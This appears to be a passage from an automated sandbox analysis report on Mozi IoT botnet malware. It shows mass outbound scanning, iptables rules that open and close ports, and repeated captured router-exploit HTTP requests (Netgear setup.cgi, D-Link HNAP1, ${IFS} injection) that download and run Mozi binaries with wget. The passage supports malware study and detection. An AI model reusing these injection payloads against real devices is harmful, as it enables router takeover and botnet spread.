                Source: global trafficTCP traffic: 192.168.2.20:51464 -> 191.161.67.173:8080
                Source: global trafficTCP traffic: 192.168.2.20:39428 -> 28.252.213.100:81
                Source: global trafficTCP traffic: 192.168.2.20:52486 -> 188.49.215.83:8080
                Source: global trafficTCP traffic: 192.168.2.20:51178 -> 101.14.201.110:7574
                Source: global trafficTCP traffic: 192.168.2.20:41060 -> 112.98.144.186:5555
                Source: global trafficTCP traffic: 192.168.2.20:57304 -> 219.172.189.248:8080
                Source: global trafficTCP traffic: 192.168.2.20:60502 -> 220.7.231.110:8080
                Source: global trafficTCP traffic: 192.168.2.20:44498 -> 173.229.39.3:81
                Source: global trafficTCP traffic: 192.168.2.20:34544 -> 179.177.100.169:81
                Source: global trafficTCP traffic: 192.168.2.20:41018 -> 144.0.182.62:37215
                Source: global trafficTCP traffic: 192.168.2.20:37776 -> 204.223.72.227:81
                Source: global trafficTCP traffic: 192.168.2.20:44130 -> 49.200.13.47:7574
                Source: global trafficTCP traffic: 192.168.2.20:39614 -> 218.145.20.192:81
                Source: global trafficTCP traffic: 192.168.2.20:47752 -> 171.158.205.147:81
                Source: global trafficTCP traffic: 192.168.2.20:42876 -> 199.83.99.48:7574
                Source: global trafficTCP traffic: 192.168.2.20:47020 -> 24.244.200.17:52869
                Source: global trafficTCP traffic: 192.168.2.20:59912 -> 143.44.220.86:52869
                Source: global trafficTCP traffic: 192.168.2.20:37316 -> 218.34.244.171:8080
                Source: global trafficTCP traffic: 192.168.2.20:60112 -> 219.15.149.67:81
                Source: global trafficTCP traffic: 192.168.2.20:36974 -> 159.212.6.68:49152
                Source: global trafficTCP traffic: 192.168.2.20:52804 -> 89.179.8.221:37215
                Source: global trafficTCP traffic: 192.168.2.20:41346 -> 54.241.53.245:8080
                Source: global trafficTCP traffic: 192.168.2.20:51258 -> 203.182.49.38:81
                Source: global trafficTCP traffic: 192.168.2.20:34910 -> 96.0.134.167:52869
                Source: global trafficTCP traffic: 192.168.2.20:55866 -> 25.84.54.191:49152
                Source: global trafficTCP traffic: 192.168.2.20:34006 -> 132.204.24.45:81
                Source: global trafficTCP traffic: 192.168.2.20:42814 -> 77.146.207.6:5555
                Source: global trafficTCP traffic: 192.168.2.20:54740 -> 70.193.124.115:8080
                Source: global trafficTCP traffic: 192.168.2.20:40672 -> 22.215.56.118:8443
                Source: global trafficTCP traffic: 192.168.2.20:59510 -> 79.233.156.161:81
                Source: global trafficTCP traffic: 192.168.2.20:35900 -> 131.164.56.28:49152
                Source: global trafficTCP traffic: 192.168.2.20:41678 -> 94.105.143.222:52869
                Source: global trafficTCP traffic: 192.168.2.20:33806 -> 42.240.2.232:52869
                Source: global trafficTCP traffic: 192.168.2.20:45322 -> 82.248.38.210:52869
                Source: global trafficTCP traffic: 192.168.2.20:38978 -> 86.42.21.77:8080
                Source: global trafficTCP traffic: 192.168.2.20:41156 -> 82.166.160.42:8080
                Source: global trafficTCP traffic: 192.168.2.20:55702 -> 115.164.165.163:8080
                Source: global trafficTCP traffic: 192.168.2.20:41750 -> 125.107.95.242:8443
                Source: global trafficTCP traffic: 192.168.2.20:45732 -> 158.221.123.193:8080
                Source: global trafficTCP traffic: 192.168.2.20:42202 -> 45.6.47.21:37215
                Source: global trafficTCP traffic: 192.168.2.20:42140 -> 108.113.55.135:37215
                Source: global trafficTCP traffic: 192.168.2.20:45128 -> 45.223.245.22:5555
                Source: global trafficTCP traffic: 192.168.2.20:41386 -> 29.165.152.160:81
                Source: global trafficTCP traffic: 192.168.2.20:33734 -> 58.42.142.49:8080
                Source: global trafficTCP traffic: 192.168.2.20:35364 -> 69.177.159.83:8080
                Source: global trafficTCP traffic: 192.168.2.20:40160 -> 39.137.251.253:81
                Source: global trafficTCP traffic: 192.168.2.20:50860 -> 97.240.224.79:5555
                Source: global trafficTCP traffic: 192.168.2.20:52252 -> 67.132.101.240:8080
                Source: global trafficTCP traffic: 192.168.2.20:43296 -> 191.69.17.65:5555
                Source: global trafficTCP traffic: 192.168.2.20:33154 -> 73.150.235.205:37215
                Source: global trafficTCP traffic: 192.168.2.20:40724 -> 171.240.208.62:8080
                Source: global trafficTCP traffic: 192.168.2.20:35514 -> 22.30.91.157:37215
                Source: global trafficTCP traffic: 192.168.2.20:40068 -> 208.11.186.103:49152
                Source: global trafficTCP traffic: 192.168.2.20:58650 -> 221.170.9.187:8443
                Source: global trafficTCP traffic: 192.168.2.20:53848 -> 75.134.61.79:8443
                Source: global trafficTCP traffic: 192.168.2.20:48944 -> 170.143.242.18:8443
                Source: global trafficTCP traffic: 192.168.2.20:55926 -> 198.64.242.147:8080
                Source: global trafficTCP traffic: 192.168.2.20:60362 -> 166.79.50.7:5555
                Source: global trafficTCP traffic: 192.168.2.20:52474 -> 189.159.1.246:8080
                Source: global trafficTCP traffic: 192.168.2.20:35372 -> 126.218.25.66:81
                Source: global trafficTCP traffic: 192.168.2.20:54260 -> 89.61.117.218:8443
                Source: global trafficTCP traffic: 192.168.2.20:48708 -> 9.206.51.148:8080
                Source: global trafficTCP traffic: 192.168.2.20:44570 -> 119.15.221.144:81
                Source: global trafficTCP traffic: 192.168.2.20:37366 -> 180.190.249.44:49152
                Source: global trafficTCP traffic: 192.168.2.20:44712 -> 69.178.186.109:81
                Source: global trafficTCP traffic: 192.168.2.20:47922 -> 55.102.201.253:81
                Source: global trafficTCP traffic: 192.168.2.20:46694 -> 168.216.111.161:37215
                Source: global trafficTCP traffic: 192.168.2.20:37238 -> 1.207.152.148:8080
                Source: global trafficTCP traffic: 192.168.2.20:59336 -> 50.70.173.82:37215
                Source: global trafficTCP traffic: 192.168.2.20:45268 -> 78.196.185.102:7574
                Source: global trafficTCP traffic: 192.168.2.20:34614 -> 220.172.15.204:7574
                Source: global trafficTCP traffic: 192.168.2.20:51434 -> 155.201.44.186:49152
                Source: global trafficTCP traffic: 192.168.2.20:50938 -> 139.84.176.29:7574
                Source: global trafficTCP traffic: 192.168.2.20:48766 -> 121.134.144.130:8443
                Source: global trafficTCP traffic: 192.168.2.20:38460 -> 3.106.131.99:49152
                Source: global trafficTCP traffic: 192.168.2.20:48356 -> 106.201.55.245:8080
                Source: global trafficTCP traffic: 192.168.2.20:51430 -> 104.218.87.244:81
                Source: global trafficTCP traffic: 192.168.2.20:33508 -> 139.93.154.170:49152
                Source: global trafficTCP traffic: 192.168.2.20:47218 -> 61.193.135.39:52869
                Source: global trafficTCP traffic: 192.168.2.20:48782 -> 36.13.133.207:5555
                Source: global trafficTCP traffic: 192.168.2.20:45878 -> 82.109.64.3:52869
                Source: global trafficTCP traffic: 192.168.2.20:33012 -> 104.178.119.156:52869
                Source: global trafficTCP traffic: 192.168.2.20:44216 -> 169.209.56.181:81
                Source: global trafficTCP traffic: 192.168.2.20:60430 -> 217.89.51.86:81
                Source: global trafficTCP traffic: 192.168.2.20:57172 -> 30.177.86.43:8443
                Source: global trafficTCP traffic: 192.168.2.20:59448 -> 90.207.33.129:8080
                Source: global trafficTCP traffic: 192.168.2.20:42788 -> 178.244.39.81:8443
                Source: global trafficTCP traffic: 192.168.2.20:40106 -> 88.61.157.84:7574
                Source: global trafficTCP traffic: 192.168.2.20:58166 -> 194.114.33.228:49152
                Source: /bin/sh (PID: 4637)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44343 -j ACCEPT
                Source: /bin/sh (PID: 4671)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44343 -j ACCEPT
                Source: /bin/sh (PID: 4674)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44343 -j ACCEPT
                Source: /bin/sh (PID: 4715)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44343 -j ACCEPT
                Source: /bin/sh (PID: 4739)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44343 -j ACCEPT
                Source: /bin/sh (PID: 4758)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44343 -j ACCEPT
                Source: /bin/sh (PID: 4776)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44343 -j ACCEPT
                Source: /bin/sh (PID: 4795)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44343 -j ACCEPT
                Source: /bin/sh (PID: 4898)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: /bin/sh (PID: 4915)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: /bin/sh (PID: 4918)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: /bin/sh (PID: 4921)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: /bin/sh (PID: 4949)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: /bin/sh (PID: 4975)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: /bin/sh (PID: 4999)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: /bin/sh (PID: 5024)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: /bin/sh (PID: 5051)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: /bin/sh (PID: 5077)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: /bin/sh (PID: 5103)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: /bin/sh (PID: 5124)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: /bin/sh (PID: 5128)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: /bin/sh (PID: 5131)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: /bin/sh (PID: 5142)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: /bin/sh (PID: 5167)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: /bin/sh (PID: 5220)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 7723 -j ACCEPT
                Source: /bin/sh (PID: 5223)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 7723 -j ACCEPT
                Source: /bin/sh (PID: 5236)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 7723 -j ACCEPT
                Source: /bin/sh (PID: 5267)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 7723 -j ACCEPT
                Source: /bin/sh (PID: 5295)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 7723 -j ACCEPT
                Source: /bin/sh (PID: 5299)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 7723 -j ACCEPT
                Source: /bin/sh (PID: 5309)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 7723 -j ACCEPT
                Source: /bin/sh (PID: 5337)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 7723 -j ACCEPT
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 154.201.250.66:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 217.182.243.67:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 45.65.120.55:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 35.244.243.215:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 146.158.12.4:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 